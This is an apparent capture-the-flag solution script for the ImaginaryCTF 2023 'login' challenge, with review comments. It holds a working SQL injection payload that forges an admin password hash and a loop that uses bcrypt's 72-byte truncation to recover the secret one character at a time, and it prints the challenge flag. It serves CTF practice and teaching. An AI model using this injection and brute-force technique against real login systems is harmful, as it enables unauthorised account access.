exploit.py
### https://github.com/f0rk3b0mb/ImaginaryCTF_login
### Code created by f0rk3b0mb
### for ImaginaryCTF2023
### 22 july 2023
import os
import string
import subprocess

import bcrypt
import requests
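# Context: solution script for the ImaginaryCTF 2023 "login" challenge. It
# relies on two weaknesses of the challenge server acting together:
#   1. The username field ends up inside the SQL statement, so a UNION SELECT
#      can return a row whose pwhash was chosen by the client.
#      Server-side fix: parameterized queries / prepared statements.
#   2. bcrypt only hashes the first 72 bytes of its input.
#      NOTE(review): the server code is not shown on this page; presumably it
#      appends a secret to the submitted password before verifying it, so
#      padding decides how many secret bytes fall inside the 72-byte window.
#      Server-side fix: keep secrets out of the password input and reject
#      (or pre-hash) inputs longer than 72 bytes.
#
# Shape of the injected username that is sent below:
#xxx' UNION SELECT 'admin' AS username,'$2y$10$C4lfi0f8kouggVBFkKF1ru./NEQTKqptjJCh6JI/hJieELWHLeFXi' AS pwhash--
url = "http://login.chal.imaginaryctf.org/?688a35c685a7a654abc80f8e123ad9f0"
#flag : ictf{why_are_bcrypt_truncating_my_passwords?!}

# Known flag prefix; each outer iteration appends one recovered character.
secret = ["i", "c", "t", "f"]

# Loop-invariant, so it is built once instead of once per request.
headers = {"Content-Type": "application/x-www-form-urlencoded"}

while True:
    # Padding plus the known prefix is 71 bytes, leaving one byte for the guess.
    length = 71 - len(secret)
    overflow = "A" * length
    for i in string.printable[:-6]:
        guess = overflow + "".join(secret) + str(i)
        # The original interpolated `guess` into a shell command line, so the
        # punctuation in string.printable (quotes, ';', '|', '$', '>', spaces)
        # was interpreted by the local shell. An argument list hands the value
        # to php verbatim and starts no shell. A missing php binary now raises
        # FileNotFoundError instead of silently yielding an empty hash.
        pw_hash = subprocess.run(
            ["php", "hasher.php", guess],
            stdout=subprocess.PIPE,
            universal_newlines=True,
            check=False,
        ).stdout
        data = f"username=xxx'+UNION+SELECT+'admin'+AS+username,'{pw_hash}'+AS+pwhash--&password={overflow}"
        r = requests.post(url, data=data, headers=headers)
        if "Welcome admin" in r.text:
            secret.append(i)
            print(f"found ...", "".join(secret))
            break
        else:
            print(f"trying {i}...")
    else:
        # No candidate matched. The original restarted the same round forever
        # and kept sending requests, so stop here instead.
        print("no further character matched, stopping")
        break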